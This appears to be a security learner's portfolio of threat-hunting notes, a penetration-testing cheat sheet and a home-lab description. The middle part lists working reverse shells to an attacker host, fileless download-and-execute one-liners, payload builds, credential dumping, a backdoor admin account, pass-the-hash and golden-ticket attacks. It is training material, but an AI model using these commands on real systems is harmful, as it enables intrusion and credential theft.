Hunt Design — Identify data sources, define IOCs, plan queries
Data Gathering — Execute SPL/KQL queries, ETW collection, PCAP analysis
Result Evaluation — Confirm or refute hypothesis
Threat Mitigation — Isolation, eradication, validation
Documentation & Sharing — Lessons learned, rule creation, threat intel output

Frameworks Applied

MITRE ATT&CK — TTP mapping for all detections
Cyber Kill Chain — Contextualising attack phases
Diamond Model — Adversary ↔ Capability ↔ Infrastructure ↔ Victim analysis
Pyramid of Pain — Prioritising IOC types (Hash → IP → Domain → Tools → TTPs)

Parent-Child Process Hunting

Abnormal relationships investigated and detected:

notepad.exe → cmd.exe / powershell.exe
spoolsv.exe → whoami.exe
svchost.exe → mshta.exe
winword.exe → powershell.exe

ETW-based detection (bypasses Sysmon Event ID 1 parent PID spoofing):

SilkETW.exe -t user -pn Microsoft-Windows-Kernel-Process -ot file -p C:\windows\temp\etw.json

Parent PID Spoofing Demo:

powershell -ep bypass
Import-Module .\psgetsys.ps1
[MyProcess]::CreateProcessFromParent([PID of spoolsv.exe], "C:\Windows\System32\cmd.exe", "")

Threat Hunting Data Sources Reference

Source	Use Case
`WinEventLog:Sysmon`	Process, network, file, registry activity
`WinEventLog:Security`	Auth events, privilege assignment, object access
`WinEventLog:SilkService-Log`	ETW-sourced LDAP, PowerShell, process events
`linux:syslog`	Linux host corroboration
`conn.log` (Zeek)	Beaconing, exfiltration volume analysis
`dns.log` (Zeek)	DNS tunnelling, C2 domain resolution
`dce_rpc.log` (Zeek)	PsExec, PrintNightmare spooler functions
EVE JSON (Suricata)	Alert, HTTP, DNS, TLS, flow metadata

All skills above were validated through hands-on labs in the HTB Academy CDSA learning path. Commands, queries, and rules are drawn directly from my personal study notes.

⚔️ Technical Skills — HTB Certified Penetration Testing Specialist (CPTS)

The following technical skills were developed and documented during preparation for the HTB CPTS certification. Each section reflects hands-on, lab-validated knowledge extracted from my personal study notes. Skills are organised by attack phase and backed by specific tool syntaxes, commands, and techniques I know how to use.

1. Network Enumeration (Nmap)

Host Discovery

Able to identify live hosts using multiple discovery techniques, understanding when to use each based on network position (local vs. routed).

Scan a network range (ICMP ping sweep):

sudo nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5

Scan from a pre-built host list:

sudo nmap -sn -oA tnet -iL hosts.lst | grep for | cut -d" " -f5

Force ICMP echo only (disable ARP, useful for remote/routed targets):

sudo nmap 10.0.0.18 -sn --disable-arp-ping -PE --packet-trace

Determine OS from TTL value:

Operating System	Default TTL
Linux / macOS	64
Windows	128
Cisco / Network Gear	255

Port & Service Scanning

6 possible port states: open, closed, filtered, unfiltered, open|filtered, closed|filtered

SYN scan (stealth, requires root — default as root):

sudo nmap 10.129.2.18 -sS -p 80,443,3389

Full TCP connect scan (no root required):

nmap 10.129.2.18 -sT -p-

UDP scan:

sudo nmap 10.129.2.18 -sU --top-ports=20

Port selection options:

-p 80 — single port
-p 80,443 — multiple ports
-p 1-100 — range
-p- — all 65535 ports
-F — top 100 ports (fast)
--top-ports=10 — top N ports by frequency

Service version detection:

sudo nmap 10.129.2.28 -p- -sV --stats-every=5s -v

Nmap Scripting Engine (NSE)

NSE Script Categories:

Category	Purpose
`auth`	Credential determination
`brute`	Brute-force login attempts
`default`	Standard scripts run with `-sC`
`discovery`	Service evaluation
`exploit`	Known vulnerability exploitation
`vuln`	Vulnerability identification
`safe`	Non-intrusive scripts
`version`	Service version extension

Run default scripts:

sudo nmap 10.129.2.28 -sC -sV -p 25

Run specific scripts:

sudo nmap 10.129.2.28 -p 25 --script banner,smtp-commands

Aggressive scan (OS detection + version + scripts + traceroute):

sudo nmap 10.129.2.28 -A

Vulnerability scan against a port:

sudo nmap 10.129.2.28 -p 80 -sV --script vuln

Scan Performance & Timing

Timing templates:

-T 0 / paranoid — maximum stealth
-T 1 / sneaky — slow, IDS evasion
-T 2 / polite — reduced bandwidth
-T 3 / normal — default
-T 4 / aggressive — faster (recommended for CTFs/labs)
-T 5 / insane — fastest, risk of missed results

Max retries (reduce for speed):

sudo nmap 10.129.2.28 -p- --max-retries 0 -T 4

2. Service Footprinting

Infrastructure Enumeration (Passive)

Subdomain discovery via Certificate Transparency (crt.sh):

curl -s "https://crt.sh/?q=<domain>&output=json" | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | sort -u

DNS records enumeration:

dig any <domain>
dig ns <domain>
dig axfr <domain> @<nameserver-ip>   # Zone transfer attempt

Subdomain brute-force with DNSenum:

dnsenum --dnsserver <IP> --enum -p 0 -s 0 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt <domain>

Correlate discovered IPs with Shodan:

for i in $(cat ip-addresses.txt); do shodan host $i; done

Cloud storage discovery:

Google Dorks: inurl:<company> site:s3.amazonaws.com, intext:<company> site:blob.core.windows.net
GrayHatWarfare for misconfigured S3/Azure/GCP buckets

FTP (Port 21)

Enumerate with Nmap scripts:

sudo nmap -sV -p21 -sC -A <IP>

Connect and interact:

ftp <IP>            # interactive client

Download all files recursively (anonymous):

wget -m --no-passive ftp://anonymous:anonymous@<IP>

Key config risks: anonymous_enable=YES, ls_recurse_enable=YES, hide_ids=YES

SMB (Ports 139/445)

List shares (null session):

smbclient -N -L //<IP>

Connect to a specific share:

smbclient //<IP>/<share>

Full SMB enumeration with rpcclient:

rpcclient -U "" <IP>

rpcclient Command	Description
`srvinfo`	Server information
`enumdomains`	List all domains
`netshareenumall`	List all shares
`enumdomusers`	List domain users
`queryuser <RID>`	User details
`querygroup <RID>`	Group details

Brute-force RIDs to enumerate users:

for i in $(seq 500 1100); do rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""; done

One-stop enumeration with Enum4Linux-ng:

./enum4linux-ng.py <IP> -A

Map shares and permissions:

smbmap -H <IP>
netexec smb <IP> -u '' -p '' --shares

NFS (Port 2049)

Enumerate NFS shares:

sudo nmap -p111,2049 -sV -sC <IP>
showmount -e <IP>

Mount a share:

sudo mount -t nfs <IP>:/ ./mnt/ -o nolock

List with UIDs/GIDs (useful for privilege matching):

ls -n ./mnt/

Unmount:

sudo umount ./mnt

DNS (Port 53)

Query Type	Command	Purpose
NS query	`dig ns <domain>`	Find name servers
ANY query	`dig any <domain>`	All available records
Zone transfer	`dig axfr <domain> @<ns-ip>`	Full zone dump
Version	`dig chaos txt version.bind @<IP>`	DNS server version

DNS record types:

Record	Description
`A`	IPv4 address
`AAAA`	IPv6 address
`MX`	Mail servers
`NS`	Name servers
`TXT`	SPF, DMARC, verification records
`CNAME`	Alias to another name
`PTR`	Reverse lookup
`SOA`	Zone authority information

SMTP (Port 25/465/587)

Connect and enumerate via Telnet:

telnet <IP> 25

VRFY to confirm users (252 = exists, 550 = not found):

VRFY <username>

Nmap enumeration:

sudo nmap -sC -sV -p25 <IP>
sudo nmap <IP> -p25 --script smtp-open-relay -v

SNMP (UDP 161/162)

Walk all OIDs with community string:

snmpwalk -v2c -c public <IP>

Brute-force community strings:

onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <IP>

Brute-force OIDs once community string is known:

braa public@<IP>:.1.3.6.*

Key OIDs:

OID	Information
`.1.3.6.1.2.1.1.1.0`	System description / OS version
`.1.3.6.1.2.1.1.4.0`	Admin contact (often reveals usernames)
`.1.3.6.1.2.1.1.5.0`	Hostname
`.1.3.6.1.2.1.1.6.0`	Location

MySQL (Port 3306) / MSSQL (Port 1433)

MySQL connection:

mysql -u <user> -p<password> -h <IP>

Useful MySQL commands:

show databases;
use <database>;
show tables;
select * from <table> where <column> = "<value>";

MSSQL enumeration with Nmap:

sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info --script-args mssql.instance-port=1433 -sV -p 1433 <IP>

MSSQL connection (Impacket):

python3 mssqlclient.py Administrator@<IP> -windows-auth

Remote Management Protocols

SSH audit:

./ssh-audit.py <IP>
ssh -v <user>@<IP> -o PreferredAuthentications=password

Rsync enumeration:

nc -nv <IP> 873
rsync -av --list-only rsync://<IP>/dev

RDP enumeration:

nmap -sV -sC <IP> -p3389 --script rdp*
xfreerdp /u:<user> /p:'<pass>' /v:<IP> /f

WinRM:

nmap -sV -sC <IP> -p5985,5986 --disable-arp-ping -n
evil-winrm -i <IP> -u <user> -p <pass>

WMI (Impacket):

wmiexec.py <user>:'<pass>'@<IP> "hostname"

3. File Transfers

Windows — Download Methods

PowerShell Base64 (for small files):

# On Linux — encode:
cat id_rsa | base64 -w 0; echo

# On Windows — decode:
[IO.File]::WriteAllBytes("C:\file", [Convert]::FromBase64String("<base64>"))
Get-FileHash C:\file -Algorithm md5   # verify

PowerShell WebClient downloads:

(New-Object Net.WebClient).DownloadFile('<URL>', '<outfile>')
(New-Object Net.WebClient).DownloadFileAsync('<URL>', '<outfile>')

# Fileless — execute in memory:
IEX (New-Object Net.WebClient).DownloadString('<URL>')
(New-Object Net.WebClient).DownloadString('<URL>') | IEX

Invoke-WebRequest (PowerShell 3.0+):

Invoke-WebRequest <URL> -OutFile output.ps1
# Bypass IE first-launch error:
Invoke-WebRequest <URL> -UseBasicParsing | IEX
# Bypass SSL/TLS:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB download (Impacket server):

# Kali — start SMB server with auth:
sudo impacket-smbserver share -smb2support /tmp/share -user test -password test

# Windows — mount and copy:
net use n: \\<kali-ip>\share /user:test test
copy \\<kali-ip>\share\nc.exe

FTP download (pyftpdlib):

# Kali — start FTP server:
sudo python3 -m pyftpdlib --port 21

# Windows — PowerShell download:
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\output.txt')

Windows — Upload Methods

PowerShell Base64 upload:

[Convert]::ToBase64String((Get-Content -path "C:\file" -Encoding byte))

Python uploadserver:

# Kali:
pip3 install uploadserver
python3 -m uploadserver 9000

# Windows — upload with PSUpload.ps1:
IEX(New-Object Net.WebClient).DownloadString('https://.../PSUpload.ps1')
Invoke-FileUpload -Uri http://<kali>:9000/upload -File C:\Windows\System32\drivers\etc\hosts

WebDAV upload (SMB over HTTP):

# Kali — start WebDAV server:
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

# Windows — connect and upload:
dir \\<kali-ip>\DavWWWRoot
copy "C:\file.txt" \\<kali-ip>\DavWWWRoot\

Linux — Download Methods

Wget / cURL:

wget <URL> -O /tmp/file.sh
curl -o /tmp/file.sh <URL>

Fileless execution:

curl <URL> | bash
wget -qO- <URL> | python3

Bash /dev/tcp (no tools available):

exec 3<>/dev/tcp/<attacker-ip>/4444
cat <&3 > received_file
exec 3<&-; exec 3>&-

Python/PHP/Ruby/Perl one-liners:

# Python3:
python3 -c 'import urllib.request;urllib.request.urlretrieve("<URL>", "out.sh")'

# PHP:
php -r '$file = file_get_contents("<URL>"); file_put_contents("out.sh",$file);'

# Ruby:
ruby -e 'require "net/http"; File.write("out.sh", Net::HTTP.get(URI.parse("<URL>")))'

Serve files from target to attacker (host a webserver):

python3 -m http.server 8080
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000

Living Off the Land (LotL)

Windows: LOLBAS Project — search /download or /upload
Linux: GTFOBins — search +file download or +file upload

Bitsadmin (Windows download):

bitsadmin /transfer wcb /priority foreground http://<IP>:8000/nc.exe C:\nc.exe

Certutil (Windows download — flagged by AV):

certutil.exe -verifyctl -split -f http://<IP>:8000/nc.exe

OpenSSL (Linux file transfer):

# Attacker — serve:
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem
openssl s_server -quiet -accept 80 -cert cert.pem -key key.pem < /tmp/file.sh

# Victim — receive:
openssl s_client -connect <attacker-ip>:80 -quiet > file.sh

CertReq.exe upload (Windows):

# Kali — listen:
sudo nc -lvnp 8000
# Windows — upload:
certreq.exe -Post -config http://<kali-ip>:8000/ c:\windows\win.ini

4. Shells & Payloads

Bind vs. Reverse Shells

Bind shell (listener on target):

# Target:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <IP> 7777 > /tmp/f

# Attacker:
nc -nv <target-ip> 7777

Reverse shell (target connects back):

# Attacker — listen:
sudo nc -lvnp 443

# Target (Windows PowerShell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker-ip>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reference: PayloadsAllTheThings Reverse Shell Cheatsheet

MSFvenom Payloads

Staged vs. Stageless:

Staged (windows/meterpreter/reverse_tcp) — small loader, downloads the rest; / separator in name
Stageless (windows/meterpreter_reverse_tcp) — self-contained; _ separator in name

Build a stageless ELF payload (Linux):

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=443 -f elf > payload.elf

Build a stageless Windows EXE:

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=443 -f exe > payload.exe

Windows Meterpreter staged:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe > meter.exe

Spawning Interactive Shells

When landing in a limited shell, upgrade to a full TTY:

/bin/sh -i
python3 -c 'import pty;pty.spawn("/bin/bash")'
perl -e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh"'
awk 'BEGIN {system("/bin/sh")}'
find . -exec /bin/sh \; -quit
vim -c ':!/bin/sh'

Web Shells

PHP web shell upload bypass (Burp Suite):

Upload .php file disguised as an image
Change Content-Type header from application/php → image/gif
Access shell at: https://<target>/images/vendor/shell.php

Laudanum web shells (pre-built ASP, ASPX, PHP, JSP — located in /usr/share/laudanum/)

Antak ASPX webshell — provides a PowerShell interface through the browser

5. Metasploit Framework

Core Workflow

msfconsole -q           # quiet start
search <term>           # find modules
use <module>
info                    # show module details
show options            # show required params
set RHOSTS <ip>
set LHOST <ip>
run / exploit

Search shortcuts:

grep meterpreter show payloads
grep meterpreter grep reverse_tcp show payloads

Database integration:

db_nmap -sV -p- -T5 -A <IP>   # scan and save results to DB
hosts                           # view discovered hosts
services                        # view discovered services

Key Module Types

Type	Path Pattern	Purpose
Auxiliary	`auxiliary/scanner/...`	Scanning, enumeration
Exploit	`exploit/windows/...`	Exploitation modules
Payload	`payload/windows/...`	Code to run post-exploit
Post	`post/multi/...`	Post-exploitation

Meterpreter

Runs entirely in memory via DLL injection — stealthy, no files written to disk.

Essential Meterpreter commands:

sysinfo              # OS and architecture
getuid               # current user context
hashdump             # dump SAM hashes
lsa_dump_sam         # SAM via Kiwi
lsa_dump_secrets     # LSA secrets
ps                   # list processes
migrate <PID>        # migrate to another process
shell                # drop to cmd.exe
upload / download    # file transfers

Local exploit suggester (privilege escalation):

use post/multi/recon/local_exploit_suggester
set SESSION <id>
run

Sessions & Jobs

sessions -l          # list active sessions
sessions -i <id>     # interact with session
background           # background current session
jobs                 # list background jobs

Firewall / IDS Evasion with MSFvenom

Encoding a payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe

Listing available encoders:

show encoders

6. Password Attacks

Hash Cracking

Identify hash type:

hashid -m '<hash>'

Hashcat attack modes:

Mode	Flag	Description
Dictionary	`-a 0`	Wordlist attack
Combinator	`-a 1`	Two wordlists combined
Mask	`-a 3`	Pattern-based brute force
Rule-based	`-a 0 -r <rules>`	Dictionary + mutations

Common Hashcat hash types:

Hash	`-m` value
MD5	`0`
NTLM	`1000`
NTLMv2	`5600`
Kerberos TGS (Kerberoast)	`13100`
DCC2 (cached domain)	`2100`

Dictionary attack:

hashcat -a 0 -m 0 <hash> /usr/share/wordlists/rockyou.txt

Dictionary + rules (best64):

hashcat -a 0 -m 0 <hash> /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Mask attack (e.g., Admin123! pattern):

hashcat -a 3 -m 0 <hash> '?u?l?l?l?l?d?d?s'

Mask Symbol	Character Set
`?l`	a-z lowercase
`?u`	A-Z uppercase
`?d`	0-9 digits
`?s`	Special characters
`?a`	All of the above

Remote Password Attacks

Multi-protocol brute forcing with NetExec:

netexec smb <IP> -u user.list -p password.list
netexec winrm <IP> -u user.list -p password.list
netexec smb <IP> -u Administrator -d . -H <NTLM-hash>   # Pass-the-Hash

Hydra:

hydra -L user.list -P password.list ssh://<IP>
hydra -L user.list -P password.list rdp://<IP>
hydra -L user.list -P password.list smb://<IP>

Connect after credential discovery:

evil-winrm -i <IP> -u <user> -p <pass>
xfreerdp /v:<IP> /u:<user> /p:'<pass>'

Windows Credential Extraction

Dump SAM/SYSTEM/SECURITY hives (requires local admin):

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

Extract hashes offline with secretsdump:

secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Crack NT hashes:

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

Remote SAM/LSA dump via NetExec:

netexec smb <IP> --local-auth -u <user> -p <pass> --sam
netexec smb <IP> --local-auth -u <user> -p <pass> --lsa

LSASS memory dump (Task Manager or PowerShell):

Get-Process lsass
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

Parse LSASS dump on Linux:

pypykatz lsa minidump lsass.dmp

DPAPI credential decryption (Chrome, Outlook, RDP):

mimikatz: dpapi::chrome /in:"...\Login Data" /unprotect

Lateral Movement — Pass-the-Hash (PtH)

PtH authenticates using an NTLM hash instead of a plaintext password.

Mimikatz PtH (opens new cmd as target user):

mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:<domain> /run:cmd.exe" exit

Impacket psexec:

impacket-psexec <user>@<IP> -hashes :<NTLM-hash>

Evil-WinRM:

evil-winrm -i <IP> -u <user> -H <NTLM-hash>

RDP PtH (requires DisableRestrictedAdmin = 0):

xfreerdp /v:<IP> /u:<user> /pth:<NTLM-hash>
# Enable on target:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

PowerShell Invoke-TheHash (no local admin required on attacker):

Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <user> -Hash <NTLM> -Command "net user backdoor P@ss /add && net localgroup administrators backdoor /add"
Invoke-WMIExec -Target <IP> -Domain <domain> -Username <user> -Hash <NTLM> -Command "<base64-powershell-revshell>"

Lateral Movement — Pass-the-Ticket (PtT)

Uses stolen Kerberos tickets for authentication instead of hashes.

Dump tickets with Mimikatz:

privilege::debug
sekurlsa::tickets /export         # saves .kirbi files
sekurlsa::ekeys                   # extract AES keys for OverPass-the-Hash

Dump tickets with Rubeus:

Rubeus.exe dump /nowrap

OverPass-the-Hash (hash → TGT):

# Mimikatz:
sekurlsa::pth /domain:<domain> /user:<user> /ntlm:<hash>

# Rubeus (AES256 — less detectable):
Rubeus.exe asktgt /domain:<domain> /user:<user> /aes256:<key> /nowrap

Pass the Ticket (inject ticket into session):

# Rubeus — request and inject in one step:
Rubeus.exe asktgt /domain:<domain> /user:<user> /rc4:<hash> /ptt

# Mimikatz — inject .kirbi file:
kerberos::ptt "C:\path\ticket.kirbi"

PowerShell Remoting with PtT:

Enter-PSSession -ComputerName DC01

7. Pivoting, Tunneling & Port Forwarding

SSH Tunneling

Local port forwarding (forward a specific remote service to local):

ssh -L <local-port>:localhost:<remote-port> <user>@<pivot-ip>
# Example — access MySQL on pivot via local port 1234:
ssh -L 1234:localhost:3306 ubuntu@<pivot-ip>

Dynamic port forwarding (SOCKS proxy — full network access via proxychains):

ssh -D 9050 ubuntu@<pivot-ip>

# Configure proxychains:
echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf

# Use any tool through the pivot:
proxychains nmap -v -Pn -sT 172.16.5.19
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
proxychains msfconsole

Remote / Reverse port forwarding (pivot connects back to attacker):

ssh -R <attacker-port>:<target-ip>:<target-port> <user>@<attacker-ip>

Chisel (TCP/UDP Tunneling over HTTP)

Download and build:

git clone https://github.com/jpillora/chisel.git
# Or use a pre-built release:
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz

Standard pivot (pivot = server, attacker = client):

# On pivot host:
./chisel server -v -p 1234 --socks5

# On attack host:
./chisel client -v <pivot-ip>:1234 socks
# Configure proxychains to use 127.0.0.1:1080

Reverse pivot (useful when inbound connections to pivot are blocked):

# On attack host:
sudo ./chisel server --reverse -v -p 1234 --socks5

# On pivot host (connects outbound to attacker):
./chisel client -v <attacker-ip>:1234 R:socks

Ligolo-ng (Transparent Tunneling)

Ligolo-ng creates a virtual network interface, making the internal network directly routable from the attack host — no proxychains needed.

Setup:

# Attack host — run the proxy:
sudo ./proxy -selfcert

# Pivot host — connect the agent:
./agent -connect <attacker-ip>:11601 --ignore-cert

In Ligolo-ng console:

session          # select the active session
autoroute        # select the internal subnet (e.g., 172.16.5.0/24)
# Create new interface → start tunnel

After tunnel is started, the internal subnet is reachable directly:

nmap -sV 172.16.5.19     # no proxychains needed
xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Socat (Relay / Redirection)

Reverse shell relay (redirect incoming connections to another host):

socat TCP-LISTEN:<port>,fork TCP:<target-ip>:<port>

Bind shell relay:

socat TCP-LISTEN:<port>,fork TCP:<target-ip>:<port>

Other Pivoting Tools

sshuttle (transparent SSH-based VPN):

sshuttle -r ubuntu@<pivot-ip> 172.16.5.0/23 --ssh-cmd "ssh -i priv-key"

Plink.exe (SSH from Windows):

plink.exe -D 9050 ubuntu@<pivot-ip>

Windows Netsh (local port forwarding — no additional tools):

netsh interface portproxy add v4tov4 listenport=<port> listenaddress=0.0.0.0 connectport=<port> connectaddress=<internal-ip>

DNS tunneling with dnscat2:

# Server (attacker):
ruby dnscat2.rb --dns "domain=<domain>,host=<attacker-ip>"

# Client (pivot):
./dnscat2 --secret=<secret> <domain>

ICMP tunneling with ptunnel-ng:

# Server: ptunnel-ng
# Client: ptunnel-ng -p <server-ip> -lp <local-port> -da <dest-ip> -dp <dest-port>

SocksOverRDP (RDP as pivot):

SocksOverRDP-Plugin.dll + SocksOverRDP-Server.exe → route traffic through RDP session

8. Active Directory Enumeration & Attacks

Initial Enumeration

Passive host discovery:

sudo responder -I <interface> -A    # analyze mode — no poisoning
fping -asgq 172.16.5.1-254
sudo wireshark / tcpdump            # capture ARP, MDNS packets

Active scanning:

sudo nmap -v -A -iL hosts.txt -oN host-enum

Username enumeration (Kerberos pre-auth — stealthy):

kerbrute userenum -d <domain> --dc <DC-IP> jsmith.txt -o valid_users.txt

LLMNR / NBT-NS Poisoning (Foothold)

When a host fails DNS resolution it broadcasts via LLMNR (TCP 5355) and NBT-NS (UDP 137). An attacker can respond and capture NTLMv2 hashes.

Capture hashes with Responder:

sudo responder -I <interface>
# Hashes saved to: /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

Crack NTLMv2 hash:

hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

Password Spraying (AD)

Enumerate password policy first:

netexec smb <DC-IP> -u <user> -p <pass> --pass-pol
crackmapexec smb <DC-IP> -u <user> -p <pass> --pass-pol

Spray from Linux:

kerbrute passwordspray -d <domain> --dc <DC-IP> valid_users.txt <password>
netexec smb <DC-IP> -u valid_users.txt -p <password> --continue-on-success

Spray from Windows:

# DomainPasswordSpray:
Invoke-DomainPasswordSpray -Password <password> -OutFile spray_results.txt -ErrorAction SilentlyContinue

Credentialed Enumeration

From Linux with BloodHound (ingestor):

bloodhound-python -u <user> -p <pass> -ns <DC-IP> -d <domain> -c All

From Linux with CME / NetExec:

netexec smb <DC-IP> -u <user> -p <pass> --users
netexec smb <DC-IP> -u <user> -p <pass> --groups
netexec smb <DC-IP> -u <user> -p <pass> --shares

From Linux with GetUserSPNs (find Kerberoastable accounts):

GetUserSPNs.py -dc-ip <DC-IP> <domain>/<user>

From Windows with PowerView:

Get-NetDomain
Get-NetDomainController
Get-DomainUser -Identity <username> | select samaccountname,memberof
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Find-LocalAdminAccess

From Windows (Living Off the Land):

net user /domain
net group "Domain Admins" /domain
wmic computersystem get Name,Domain
nltest /dclist:<domain>

Security controls enumeration:

# Check for AV / EDR:
Get-MpComputerStatus              # Windows Defender status
Get-AppLockerPolicy -Effective    # AppLocker policy

Kerberoasting

Requests TGS tickets for SPN-enabled accounts and cracks the RC4-encrypted tickets offline.

From Linux:

# List kerberoastable accounts:
GetUserSPNs.py -dc-ip <DC-IP> <domain>/<user>

# Request a specific TGS:
GetUserSPNs.py -dc-ip <DC-IP> <domain>/<user> -request-user <svc-account> -outputfile tgs.txt

# Crack the ticket:
hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt

From Windows:

# Rubeus:
.\Rubeus.exe kerberoast /outfile:spns.txt

# PowerView:
Get-DomainUser -SPN | select samaccountname,serviceprincipalname

ACL Abuse

Abusing misconfigured Access Control Entries to escalate privileges or move laterally.

Enumerate ACLs with PowerView:

Find-InterestingDomainAcl -ResolveGUIDs
Get-ObjectAcl "DC=<domain>,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')}

Check if a user has DCSync rights:

$sid = (Get-DomainUser -Identity <user>).objectsid
Get-ObjectAcl "DC=<domain>,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid}

Common abusable ACE rights:

Right	Abuse
`GenericAll`	Full control — change password, add to groups
`GenericWrite`	Write attributes — set SPN for Kerberoasting
`WriteOwner`	Take ownership of the object
`WriteDACL`	Modify ACL — grant yourself more rights
`ForceChangePassword`	Reset user password without knowing current
`DS-Replication-Get-Changes-All`	DCSync attack

DCSync

Impersonate a Domain Controller to pull NTLM hashes for any user, including krbtgt.

With secretsdump.py (requires DS-Replication rights):

secretsdump.py -outputfile hashes -just-dc <domain>/<user>@<DC-IP>
secretsdump.py -just-dc-user administrator <domain>/<user>@<DC-IP>

With Mimikatz (run as a user with replication rights):

runas /netonly /user:<domain>\<user> powershell
# In new PS window:
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:<domain> /user:<domain>\administrator

Domain Trust Attacks

Enumerate trusts:

Get-DomainTrust
Get-DomainTrustMapping

Child → Parent trust escalation (ExtraSids attack):

# Get krbtgt hash of child domain via DCSync:
secretsdump.py <child-domain>/<user>@<child-DC-IP> -just-dc-user <child-domain>/krbtgt

# Get Enterprise Admin SID:
Get-DomainGroup -Domain <parent-domain> -Identity "Enterprise Admins" | select distinguishedname,objectsid

# Forge Golden Ticket with ExtraSids:
.\mimikatz.exe
kerberos::golden /user:Administrator /domain:<child-domain> /sid:<child-domain-SID> /krbtgt:<hash> /sids:<enterprise-admin-SID> /ptt

From Linux using Impacket:

raiseChild.py -target-exec <parent-DC-IP> <child-domain>/<user>

Cross-forest trust abuse:

# Enumerate foreign group membership:
Get-DomainForeignGroupMember -Domain <target-domain>

# Use BloodHound to map trust paths

Bleeding Edge Vulnerabilities (Key Concepts Studied)

PrintNightmare (CVE-2021-1675/34527) — Abuses Windows Print Spooler for remote code execution and local privilege escalation
Shadow Credentials — Abusing msDS-KeyCredentialLink attribute to obtain a TGT for a user
noPac (CVE-2021-42278/42287) — Machine account name spoofing to impersonate a DC and gain domain admin

Privileged Access & Defensive Awareness

Privileged groups to target:

Group	Access Level
Domain Admins	Full domain control
Enterprise Admins	Full forest control
Schema Admins	Modify AD schema
Account Operators	Manage non-privileged accounts
Backup Operators	Read all files, log on locally to DCs
Print Operators	Load drivers, log on to DCs
Server Operators	Manage domain servers

Key defensive considerations studied:

LAPS (Local Administrator Password Solution) — prevents PtH across workstations
Protected Users security group — prevents NTLM, credential caching, and Kerberos delegation
PAW (Privileged Access Workstations) — dedicated admin workstations
Tiered administration model — separates user, workstation, server, and DC admin tiers

🏗️ Advanced Cybersecurity Home Lab (Proxmox)

Built a multi-VLAN, enterprise-grade cybersecurity lab on a bare-metal Proxmox VE Type-1 hypervisor, simulating a realistic corporate network for hands-on offensive and defensive security practice across the full attack-defend lifecycle.

Infrastructure

Component	Details
Hypervisor	Proxmox VE (Type-1 bare-metal) with Open vSwitch (OVS)
Firewall / Router	pfSense — WAN + 3 segmented LAN interfaces
Domain Controller	Windows Server 2025 — Active Directory, DNS, DHCP
Workstations	2× Windows 11 Enterprise (domain-joined)
Blue Team Platform	Kali Purple (VLAN 20 — SOC/defender network)
Red Team Platform	Kali Linux (VLAN 30 — isolated attack network)

Network Architecture

Three isolated VLANs enforced at the OVS layer and routed through pfSense, ensuring clean separation between corporate, security operations, and attack traffic.

VLAN	Subnet	Purpose
VLAN 10	`10.0.1.0/24`	Corporate LAN — AD, Windows workstations, DC
VLAN 20	`10.0.2.0/24`	Security Operations — SIEM, EDR, threat hunting
VLAN 30	`10.0.3.0/24`	Attack Network — isolated red team platform

Security Stack Deployed

🔵 Endpoint Telemetry — Sysmon

Deployed Microsoft Sysinternals Sysmon across all Windows endpoints and the domain controller with a hardened configuration to generate high-fidelity process, network, file, and registry telemetry.

Captures: process creation (Event ID 1), network connections (3), file creation (11), registry modifications (13), LSASS access (10), DNS queries (22), and more
Feeds structured event logs into the SIEM pipeline for detection rule development and threat hunting exercises

